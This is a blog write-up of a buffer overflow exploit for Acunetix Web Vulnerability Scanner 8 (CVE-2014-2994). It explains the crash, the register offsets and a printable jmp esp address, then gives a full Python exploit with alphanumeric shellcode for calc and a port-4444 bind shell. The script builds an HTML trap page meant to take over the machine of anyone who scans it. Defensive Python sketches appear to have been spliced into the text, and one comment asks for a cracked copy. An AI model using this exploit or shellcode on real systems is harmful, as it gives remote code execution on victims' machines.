Pwning Script Kiddies – Acunetix Buffer Overflow
Introduction
Recently a security researcher named “Danor Cohen – An7i” found a buffer overflow vulnerability and wrote a nice exploit for Acunetix Web Vulnerability Scanner 8.0. As this exploit was an ASCII-based one I was interested in re-writing it, because my previous exploit was also ASCII based. However, with the rise of bug bounties and responsible disclosure policies I’ve seen many people firing up web application security scanners against live hosts where automated vulnerability assessments are not permitted at all. Well, by triggering this buffer overflow vulnerability we can have some fun owning the noobs 😉
Crash
When we submit a new website to be scanned by Acunetix it searches for HTML tags like <img src="">, <a href=""> to get the additional hosts from that website. So if we place an HTML tag in the page like
[code language="html"]
<a href="http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
[/code]
I first gave 1000 A chars to crash the app. I created an HTML file with the above payload. Click “New Scan”, give the target and keep on clicking Next until you get this dialog box.
Acunetix detects http://AAAAAA as an external website under Additional Hosts. Tick it and proceed 😉 The app will terminate. Let’s have a closer look with the debugger.
We can clearly see that the app takes only ASCII printable chars, as we are dealing with a URL string. We cannot inject ASCII special chars either, like ‘ “ / #; they get URL encoded. So our character set would be something like 0-9 a-z A-Z and chars like ={}!()[]. Also we can see that the EDX register is overwritten with A chars.
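The scanner's own host-harvesting code is not available, so here is an added Python 3 sketch (not Acunetix code and not from the original post) of how an additional-hosts collector can apply the length and character checks that would turn the oversized href above into a rejected entry instead of a crash; the RFC 1035 limits are the only assumptions beyond the two tags named in the text.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

MAX_HOST_LEN = 253   # RFC 1035 limit for a whole hostname
MAX_LABEL_LEN = 63   # RFC 1035 limit for one dot-separated label
LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?$")

def valid_hostname(host):
    """Size and character checks a DNS name must pass before it is stored."""
    if not host or len(host) > MAX_HOST_LEN:
        return False
    labels = host.rstrip(".").split(".")
    return all(len(l) <= MAX_LABEL_LEN and LABEL_RE.match(l) for l in labels)

class HostCollector(HTMLParser):
    """Harvests hosts from <a href> and <img src>, the tags named above."""
    def __init__(self):
        super().__init__()
        self.hosts, self.rejected = set(), 0

    def handle_starttag(self, tag, attrs):
        wanted = {"a": "href", "img": "src"}.get(tag)
        for name, value in attrs:
            if name == wanted and value:
                self._consider(value)

    def _consider(self, url):
        try:
            host = urlsplit(url).hostname
        except ValueError:      # e.g. unbalanced IPv6 brackets
            host = None
        if host is None:        # relative link: nothing to add
            return
        if valid_hostname(host):
            self.hosts.add(host)
        else:
            self.rejected += 1  # dropped instead of copied into a fixed buffer

def collect_hosts(html):
    """Return (sorted accepted hosts, count of rejected candidates)."""
    parser = HostCollector()
    parser.feed(html)
    return sorted(parser.hosts), parser.rejected

# Constructed sample: two normal references, a relative link, and the write-up's 1000-'A' host.
SAMPLE_HTML = ('<a href="http://example.com/page">x</a>'
               '<img src="https://cdn.example.org/logo.png">'
               '<a href="/local/path">y</a>'
               '<a href="http://' + "A" * 1000 + '">z</a>')
```

Running `collect_hosts(SAMPLE_HTML)` accepts the two real hosts and counts the oversized one as rejected, so nothing of unbounded length ever reaches the storage step.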
We can see that EIP points to this memory location, which holds:
[code language="text"]
00405998 8B4A F8 MOV ECX,DWORD PTR DS:[EDX-8]
[/code]
The value at EDX-8 is moved into ECX, so EDX has to point to readable memory.
We need to fix the flow of the application somehow. According to An7i, he found the address 0x66303035 = f005 (reading the bytes most-significant first), which is made of ASCII printable chars without any URL encoding or bad chars 🙂
Building the Exploit
It’s time to start developing the exploit. I will be using Python for the exploit. You can use whatever you like; the language doesn’t really matter. First let’s create a pattern and get the exact offset of the EDX register.
EDX contains the value 6A413969. Let’s check the offset.
After 268 bytes we can write the address that lands in EDX and fixes the application flow. Yes! We were able to overwrite the EIP register as well; it sits 4 bytes after EDX. Next we can place our shellcode at ESP and pwn the system, but our jmp esp address has to be made of printable ASCII chars.
Let’s find a printable ASCII jmp esp address by using mona.
[code language="text"]
!mona jmp -r esp -cp asciiprint
0x4d526349 : jmp esp | asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [WINHTTP.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.2180 (C:\WINDOWS\system32\WINHTTP.dll)
[/code]
I will be using the address from WINHTTP.dll. That address is equal to “MRcI” (it goes into the buffer in little-endian byte order), which is perfect for our exploit. For the payload we have to encode it using the x86/alpha_mixed encoder. You can manually encode your payload like this:
[code language="bash"]
ALPHA3.py esp --input="shellcode.bin"
[/code]
Or pipe msfpayload directly into msfencode and get the job done.
[code language="bash"]
msfpayload windows/exec cmd=calc EXITFUNC=thread R| msfencode -e x86/alpha_mixed -t python BufferRegister=ESP
[/code]
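As an added check on the numbers in this section (my own Python 3 script, not part of the original exploit), the following reimplements the cyclic pattern and offset lookup and tests whether a 32-bit address, written in the little-endian byte order x86 reads it, consists only of the characters the URL filter passes unchanged; the character set is the one listed in the Crash section.

```python
import string
import struct

# Characters the scanner leaves unencoded in the URL, as worked out in the Crash section.
ALLOWED = set(string.ascii_letters + string.digits + "={}!()[]")

def cyclic_pattern(length):
    """Metasploit-style pattern (Aa0Aa1...Aa9Ab0...) cut to `length` bytes;
    every 4-byte window is unique, so a register value read from it maps
    back to exactly one offset."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]

def as_buffer_bytes(value):
    """The 4 characters that must sit in the buffer for a little-endian x86
    register to end up holding `value`."""
    return struct.pack("<I", value).decode("latin-1")

def pattern_offset(value, length=3000):
    """Where the register value seen in the debugger was read from in the
    pattern, or -1 if the value did not come from the pattern."""
    return cyclic_pattern(length).find(as_buffer_bytes(value))

def survives_url_filter(address):
    """True when every byte of the address is in the unencoded set, so the
    address reaches the stack unchanged."""
    return all(ch in ALLOWED for ch in as_buffer_bytes(address))

if __name__ == "__main__":
    # EDX held 0x6A413969 after the pattern was sent; the write-up found offset 268.
    print("EDX offset:", pattern_offset(0x6A413969))
    for addr in (0x66303035, 0x4D526349):
        print(hex(addr), as_buffer_bytes(addr), survives_url_filter(addr))
```

Note that the two addresses spell "500f" and "IcRM" once written in the order the CPU reads them, which is why the prose above gives them reversed.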
Final Exploit
[code language="python"]
#!/usr/bin/python
# Title: Acunetix Web Vulnerability Scanner Buffer Overflow Exploit
# Version: 8
# Build: 20120704
# Tested on: Windows XP SP2 en
# Vendor: http://www.acunetix.com/
# Original Advisory: http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html
# Exploit-Author: Osanda Malith
# Follow @OsandaMalith
# /!\ Author is not responsible for any damage you cause
# This POC is for educational purposes only
# Video: https://www.youtube.com/watch?v=RHaMx8K1GeM
# CVE: CVE-2014-2994
# Python 2 script (raw_input and print statements).
'''
Host the generated file in a server. The victim should select the external host. Otherwise we cannot trigger
the vulnerability.
'''
print('[~] Acunetix Web Vulnerability Scanner Buffer Overflow Exploit\n')
while True:
    try:
        choice = int(raw_input("[?] Choose your payload:\n1. Calculator\n2. Bind Shell\n"))
    except ValueError:
        print "[!] Enter only a number"
        continue
    if choice == 1:
        # msfpayload windows/exec cmd=calc EXITFUNC=thread R| msfencode -e x86/alpha_mixed -t python BufferRegister=ESP
        shellcode = ""
        shellcode += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
        shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
        shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
        shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
        shellcode += "\x49\x6c\x6d\x38\x6e\x69\x75\x50\x73\x30\x77\x70\x63"
        shellcode += "\x50\x6f\x79\x68\x65\x30\x31\x49\x42\x63\x54\x4c\x4b"
        shellcode += "\x31\x42\x46\x50\x4c\x4b\x46\x32\x44\x4c\x6e\x6b\x70"
        shellcode += "\x52\x46\x74\x4c\x4b\x64\x32\x34\x68\x64\x4f\x4e\x57"
        shellcode += "\x30\x4a\x35\x76\x66\x51\x69\x6f\x64\x71\x69\x50\x6e"
        shellcode += "\x4c\x65\x6c\x71\x71\x61\x6c\x77\x72\x74\x6c\x31\x30"
        shellcode += "\x69\x51\x4a\x6f\x54\x4d\x53\x31\x69\x57\x39\x72\x58"
        shellcode += "\x70\x71\x42\x53\x67\x6e\x6b\x63\x62\x74\x50\x6e\x6b"
        shellcode += "\x53\x72\x57\x4c\x77\x71\x48\x50\x6c\x4b\x37\x30\x31"
        shellcode += "\x68\x4e\x65\x4b\x70\x43\x44\x31\x5a\x36\x61\x58\x50"
        shellcode += "\x62\x70\x6c\x4b\x31\x58\x34\x58\x6e\x6b\x42\x78\x77"
        shellcode += "\x50\x36\x61\x38\x53\x6b\x53\x67\x4c\x57\x39\x4e\x6b"
        shellcode += "\x77\x44\x4e\x6b\x47\x71\x69\x46\x34\x71\x49\x6f\x64"
        shellcode += "\x71\x39\x50\x6c\x6c\x6f\x31\x7a\x6f\x46\x6d\x47\x71"
        shellcode += "\x69\x57\x35\x68\x59\x70\x71\x65\x49\x64\x57\x73\x33"
        shellcode += "\x4d\x6a\x58\x35\x6b\x43\x4d\x67\x54\x31\x65\x6d\x32"
        shellcode += "\x61\x48\x6c\x4b\x51\x48\x34\x64\x66\x61\x6e\x33\x35"
        shellcode += "\x36\x6c\x4b\x66\x6c\x30\x4b\x4e\x6b\x43\x68\x45\x4c"
        shellcode += "\x33\x31\x4a\x73\x4c\x4b\x53\x34\x4e\x6b\x53\x31\x4e"
        shellcode += "\x30\x4c\x49\x37\x34\x54\x64\x54\x64\x73\x6b\x31\x4b"
        shellcode += "\x31\x71\x52\x79\x42\x7a\x53\x61\x79\x6f\x69\x70\x42"
        shellcode += "\x78\x63\x6f\x43\x6a\x6c\x4b\x77\x62\x7a\x4b\x6c\x46"
        shellcode += "\x53\x6d\x70\x6a\x57\x71\x4c\x4d\x4e\x65\x6e\x59\x53"
        shellcode += "\x30\x45\x50\x47\x70\x52\x70\x52\x48\x44\x71\x6e\x6b"
        shellcode += "\x42\x4f\x4b\x37\x6b\x4f\x78\x55\x4d\x6b\x6b\x50\x45"
        shellcode += "\x4d\x56\x4a\x47\x7a\x50\x68\x4f\x56\x4e\x75\x6f\x4d"
        shellcode += "\x4f\x6d\x59\x6f\x68\x55\x77\x4c\x46\x66\x51\x6c\x65"
        shellcode += "\x5a\x6d\x50\x6b\x4b\x4b\x50\x44\x35\x56\x65\x6f\x4b"
        shellcode += "\x71\x57\x64\x53\x54\x32\x42\x4f\x53\x5a\x33\x30\x61"
        shellcode += "\x43\x49\x6f\x68\x55\x33\x53\x33\x51\x52\x4c\x43\x53"
        shellcode += "\x65\x50\x41\x41"
        break
    elif choice == 2:
        # Modify this part with your own custom shellcode
        # msfpayload windows/shell/bind_tcp EXITFUNC=thread LPORT=4444 R| msfencode -e x86/alpha_mixed -t python BufferRegister=ESP
        shellcode = ""
        shellcode += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
        shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
        shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
        shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
        shellcode += "\x69\x6c\x4b\x58\x6c\x49\x65\x50\x73\x30\x73\x30\x31"
        shellcode += "\x70\x6e\x69\x48\x65\x70\x31\x59\x42\x55\x34\x4c\x4b"
        shellcode += "\x42\x72\x76\x50\x6c\x4b\x73\x62\x76\x6c\x4c\x4b\x53"
        shellcode += "\x62\x57\x64\x6e\x6b\x63\x42\x34\x68\x66\x6f\x48\x37"
        shellcode += "\x30\x4a\x54\x66\x55\x61\x79\x6f\x55\x61\x4b\x70\x4c"
        shellcode += "\x6c\x35\x6c\x30\x61\x33\x4c\x75\x52\x64\x6c\x67\x50"
        shellcode += "\x6f\x31\x5a\x6f\x54\x4d\x47\x71\x48\x47\x6b\x52\x38"
        shellcode += "\x70\x61\x42\x46\x37\x6e\x6b\x32\x72\x66\x70\x6e\x6b"
        shellcode += "\x73\x72\x75\x6c\x73\x31\x4e\x30\x6e\x6b\x71\x50\x43"
        shellcode += "\x48\x4b\x35\x49\x50\x61\x64\x72\x6a\x33\x31\x78\x50"
        shellcode += "\x76\x30\x4c\x4b\x77\x38\x35\x48\x6e\x6b\x53\x68\x61"
        shellcode += "\x30\x65\x51\x5a\x73\x69\x73\x77\x4c\x50\x49\x4e\x6b"
        shellcode += "\x56\x54\x6e\x6b\x45\x51\x69\x46\x75\x61\x6b\x4f\x66"
        shellcode += "\x51\x49\x50\x6c\x6c\x4b\x71\x78\x4f\x56\x6d\x35\x51"
        shellcode += "\x4a\x67\x50\x38\x59\x70\x61\x65\x39\x64\x67\x73\x31"
        shellcode += "\x6d\x6a\x58\x45\x6b\x43\x4d\x76\x44\x50\x75\x49\x72"
        shellcode += "\x52\x78\x6e\x6b\x61\x48\x46\x44\x43\x31\x68\x53\x45"
        shellcode += "\x36\x4e\x6b\x34\x4c\x42\x6b\x6e\x6b\x73\x68\x35\x4c"
        shellcode += "\x57\x71\x6b\x63\x4c\x4b\x53\x34\x6c\x4b\x43\x31\x4e"
        shellcode += "\x30\x4e\x69\x32\x64\x47\x54\x56\x44\x73\x6b\x61\x4b"
        shellcode += "\x75\x31\x31\x49\x72\x7a\x76\x31\x59\x6f\x59\x70\x61"
        shellcode += "\x48\x51\x4f\x31\x4a\x6c\x4b\x52\x32\x78\x6b\x6e\x66"
        shellcode += "\x43\x6d\x42\x48\x67\x43\x45\x62\x37\x70\x63\x30\x72"
        shellcode += "\x48\x42\x57\x32\x53\x76\x52\x31\x4f\x42\x74\x50\x68"
        shellcode += "\x52\x6c\x64\x37\x64\x66\x44\x47\x39\x6f\x69\x45\x4d"
        shellcode += "\x68\x5a\x30\x65\x51\x57\x70\x63\x30\x76\x49\x59\x54"
        shellcode += "\x31\x44\x52\x70\x45\x38\x64\x69\x4f\x70\x50\x6b\x57"
        shellcode += "\x70\x59\x6f\x7a\x75\x52\x70\x52\x70\x32\x70\x52\x70"
        shellcode += "\x47\x30\x30\x50\x67\x30\x66\x30\x63\x58\x48\x6a\x54"
        shellcode += "\x4f\x49\x4f\x69\x70\x79\x6f\x4e\x35\x4c\x57\x45\x61"
        shellcode += "\x6b\x6b\x51\x43\x73\x58\x73\x32\x57\x70\x34\x51\x73"
        shellcode += "\x6c\x6f\x79\x4a\x46\x42\x4a\x76\x70\x46\x36\x50\x57"
        shellcode += "\x71\x78\x7a\x62\x4b\x6b\x70\x37\x72\x47\x6b\x4f\x48"
        shellcode += "\x55\x62\x73\x51\x47\x72\x48\x4c\x77\x78\x69\x47\x48"
        shellcode += "\x4b\x4f\x69\x6f\x48\x55\x30\x53\x52\x73\x53\x67\x45"
        shellcode += "\x38\x62\x54\x5a\x4c\x67\x4b\x6d\x31\x69\x6f\x5a\x75"
        shellcode += "\x72\x77\x6c\x57\x62\x48\x54\x35\x50\x6e\x32\x6d\x35"
        shellcode += "\x31\x4b\x4f\x69\x45\x61\x7a\x77\x70\x32\x4a\x73\x34"
        shellcode += "\x62\x76\x61\x47\x70\x68\x63\x32\x78\x59\x4a\x68\x31"
        shellcode += "\x4f\x49\x6f\x48\x55\x6e\x6b\x46\x56\x51\x7a\x71\x50"
        shellcode += "\x62\x48\x65\x50\x46\x70\x63\x30\x43\x30\x31\x46\x32"
        shellcode += "\x4a\x55\x50\x71\x78\x31\x48\x49\x34\x66\x33\x6b\x55"
        shellcode += "\x59\x6f\x4e\x35\x4f\x63\x72\x73\x71\x7a\x37\x70\x30"
        shellcode += "\x56\x70\x53\x71\x47\x45\x38\x74\x42\x38\x59\x6f\x38"
        shellcode += "\x33\x6f\x49\x6f\x69\x45\x67\x71\x79\x53\x76\x49\x6b"
        shellcode += "\x76\x6f\x75\x48\x76\x62\x55\x58\x6c\x49\x53\x41\x41"
        print "[+] Connect on port 4444"
        break
    else:
        print "[-] Invalid Choice"
        continue

# Banner shown to anyone who opens the page in a browser. The listing of the
# next lines was mangled by the blog software; they are rebuilt from what remained
# and from the offsets worked out above.
head = ("<center>\n"
        "<h1>Scan This Site and Get Pwned :)</h1>\n"
        "</center>\n")
# Open the link; 268 bytes of padding after http:// reach the saved EDX value.
junk = "<a href=\"http://" + "A" * 268
# EDX must point at readable memory for MOV ECX,DWORD PTR DS:[EDX-8];
# 0x66303035 written in little-endian byte order.
edx = "500f"
# 4 more bytes separate EDX from the saved return address.
junk2 = "AAAA"
# 0x4d526349, jmp esp in WINHTTP.dll, written in little-endian byte order.
eip = "IcRM"
# Close the href and the anchor so the page still renders for a human visitor.
tail = "\"><img src=\"http://i.imgur.com/BimAoR0.jpg\" alt=\"\" /></a>\n"
exploit = head + junk + edx + junk2 + eip + shellcode + tail
filename = "Exploit.htm"
with open(filename, "w") as f:
    f.write(exploit)
print "[~] " + str(len(exploit)) + " Bytes written to file"
#EOF
[/code]
http://pastie.org/9107965
The latest version 9 is not vulnerable. Don’t get pwned kiddies 😉
CVE-2014-2994
http://packetstormsecurity.com/files/126307/Acunetix-8-Scanner-Buffer-Overflow.html
SANS InfoSec Handlers Diary Blog:
https://isc.sans.edu/diary/Using+Security+Tools+to+Compromize+a+Network/21903
😮 (y) Great find bro .. (y)
Amazing bro. Very well detailed and explained. Keep it up. (Y)
Great post man!
Great job bro. Well done
Great …
But Danor Cohen –> An7i says
———————————————————————————————————–
Well, I can tell you that newer versions are vulnerable too. I just didn’t mention that in my article, but I tested it myself. Version 9 is the only one that isn’t vulnerable. 🙁
————————————————————————————————————-
My question is:
I can’t find v8 of Acunetix .. Can you give me a link to yours? & is it cracked?
Thanks 4 share 🙂